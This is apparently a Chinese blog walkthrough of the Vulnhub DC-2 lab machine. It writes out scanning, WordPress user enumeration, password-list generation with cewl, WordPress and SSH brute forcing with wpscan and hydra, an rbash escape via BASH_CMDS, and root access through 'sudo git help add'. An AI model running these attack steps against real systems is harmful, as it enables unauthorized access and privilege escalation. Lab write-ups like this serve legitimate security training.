Vulnhub-DC-2靶机实战

前言

首发个人博客👉个人博客地址
文章地址👉文章地址

靶机下载地址:https://www.vulnhub.com/entry/dc-2,311/

​ KALI地址:192.168.1.18

​ 靶机地址:192.168.1.33


一.信息收集

1.发现主机

使用命令如下,如下图,这里发现了靶机IP地址。

netdiscover -r 192.168.1.18

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-FesIdAIX-1648455805631)(/images/wordimage/2022/0328/netdiscover.png)]


2.扫描主机

使用命令如下,发现了主机开放了807744端口其中7744是SSH连接端口

nmap -A -T4 -O -p 0-65535 192.168.1.33

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-E3AxA3rt-1648455805632)(/images/wordimage/2022/0328/SSHandWEB.png)]


3.目录扫描

既然是网站,那么肯定是,有网站目录的,那么先二话不说直接扫描,使用命令,如下,并且如下图,发现是wordpress站点。

dirb http://192.168.1.33

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-pjX1GYvE-1648455805632)(/images/wordimage/2022/0328/wordpress.png)]


4.网页信息挖掘

4.1.解决不能访问的问题

我们直接访问网站,发现重定向了到了一个域名,我们访问不了,如下图,访问IP地址会跳转到这个地址

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ksJjMyny-1648455805633)(/images/wordimage/2022/0328/dc-2.png)]

解决办法如下,在KALI里面打卡cat /etc/hosts文件,然后如下图设置即可

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Jzs98OSj-1648455805634)(/images/wordimage/2022/0328/hosts.png)]

然后我们再次访问,就可以了,如下图访问成功。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-05ObkoTe-1648455805635)(/images/wordimage/2022/0328/dc-2succ.png)]


4.2.挖掘wordpress用户

既然是wordpress框架,肯定少不了wpscan的扫描,命令如下。

wpscan --url http://dc-2 -e u

扫描结果如下图,发现了admin,jerry,tom用户。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-TykRR0AH-1648455805636)(/images/wordimage/2022/0328/wordpressusers.png)]


4.3.挖掘第一个flag

经过深度挖掘,看源代码,看URL地址,查看网络文件,均没有发现东西,但是在flag这行里面发现了东西,如下图。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-EUjHrmXA-1648455805636)(/images/wordimage/2022/0328/flag1.png)]

然后翻译如下,发现是叫我们使用cewl这个工具,cewl这个工具的作用是生成密码,用深度爬虫来分析网站生成密码。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-DOTEVyOr-1648455805637)(/images/wordimage/2022/0328/cewl.png)]


二.漏洞利用

1.暴力破解wordpress

经过第一个flag提示,我们使用cewl工具来生成密码,命令如下。

cewl dc-2 -w dict.txt

这句话的意思是什么呢?网站是dc-2,然后-w,把分析出来的密码,写入dict.txt里面去。

然后在加上上面我们挖掘出来的wordpress用户,我们可以把admin,jerry,tom写入用户本里面去,如下图。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-W5GqxSfa-1648455805638)(/images/wordimage/2022/0328/dict.png)]

然后我们就可以使用wpscan来暴力破解wordpress后台密码,命令如下,并且如下图成功。

wpscan --url http://dc-2 -P dict.txt -U user.txt

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-anhiifdB-1648455805638)(/images/wordimage/2022/0328/wordpressusersucc.png)]

账户:jerry

密码:adipiscing

账户:tom

密码:parturient

就发现了两个用户,然后我们就可以尝试登录后台,根据上面目录扫描发现后台地址是/wp-admin,首先尝试的是jerry账户,我们在文章栏里面发现了第二个flag如下图。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-l2jh4hcv-1648455805639)(/images/wordimage/2022/0328/flag2.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Srh5CLKM-1648455805640)(/images/wordimage/2022/0328/flag2-1.png)]

谷歌翻译一下,看看,翻译如下,意思是wordpress没有可以利用的点了,确实是这样,我还想找地方写一句话木马,结果没有写入点。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-fQ1tDgDC-1648455805641)(/images/wordimage/2022/0328/OKwordpress.png)]


2.暴力破解ssh

既然wordpress没有可以利用的地方了,还有一个ssh连接点,经过测试,可以使用wordpress的账户和密码登录ssh,但是只有tom这个用户可以登录,但是如果猜想不对的话,可以暴力破解,这里暴力破解使用的工具是hydra,命令如下。

-L 用户字典

-P 密码字典

-s 指定端口

-vV 显示详细破解信息

hydra -L user.txt -P dict.txt -s 7744 ssh://192.168.1.33 -vV

如下图,破解成功。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Ho9idiji-1648455805642)(/images/wordimage/2022/0328/sshtom.png)]


三.提权

直接ssh连接靶机,即可,命令如下。

ssh -p 7744 tom@192.168.1.33

如下图,连接成功,

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-V1W4hNoV-1648455805642)(/images/wordimage/2022/0328/sshtomtom.png)]

经过,尝试,发现,很多命令不能用,所以我们直接查看环境变量,看看能用的命令,如下图,顺便发现了第三个flag,但是不能使用cat命令查看,而且查看,能使用的命令是less ls scp vi

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-oAd7x1mK-1648455805643)(/images/wordimage/2022/0328/findecho.png)]

命令全部如下。

tom@DC-2:~$ echo $PATH
/home/tom/usr/bin
tom@DC-2:~$ ls
flag3.txt  test  usr
tom@DC-2:~$ ls usr/bin
less  ls  scp  vi
tom@DC-2:~$ 

然后我们可以尝试绕过,按照如下命令输入即可

tom@DC-2:~$ BASH_CMDS[a]=/bin/sh;a
$ /bin/bash
tom@DC-2:~$ export PATH=$PATH:/bin/
tom@DC-2:~$ export PATH=$PATH:/usr/bin

然后就可以查看第三个flag,如下图。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3V9SGnnq-1648455805644)(/images/wordimage/2022/0328/flag3.png)]

翻译过来如下。

可怜的老汤姆总是追着杰瑞跑。 也许他应该为他造成的所有压力感到不安

尝试了tom的很多命令,比如sudo -l用不了,那这样我们切换到jerry账户,上面没有破解成功,应该是不让远程登录。

用户:jerry

密码:adipiscing

然后登录成功,在jerry的家目录下面发现了第四个flag,如下图。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-kLAxLwKd-1648455805645)(/images/wordimage/2022/0328/jerry.png)]

内容如下。

Good to see that you've made it this far - but you're not home yet. 

You still need to get the final flag (the only flag that really counts!!!).  

No hints here - you're on your own now.  :-)

Go on - git outta here!!!!

然后,这里使用命令sudo -l查看有那些sudo命令,发现可以使用git命令提权。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-FtgrEq9l-1648455805645)(/images/wordimage/2022/0328/jerrysudo-l.png)]

GIT提权可以看这个文章👉GIT提权原理

使用命令如下。

sudo git help add

然后输入!/bin/bash,就可以完成提权了。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-t4MuHy3Z-1648455805646)(/images/wordimage/2022/0328/bash.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-rp4Ljyy7-1648455805647)(/images/wordimage/2022/0328/root.png)]

然后就可以查看最后一个flag就可以了,如下图。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-5SSBqtLS-1648455805648)(/images/wordimage/2022/0328/flag5.png)]


四.总结

绕过命令限制可以使用

tom@DC-2:~$ BASH_CMDS[a]=/bin/sh;a
$ /bin/bash
tom@DC-2:~$ export PATH=$PATH:/bin/
tom@DC-2:~$ export PATH=$PATH:/usr/bin

然后新的暴力破解方法,hydra

hydra -L user.txt -P dict.txt -s 7744 ssh://192.168.1.33 -vV
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值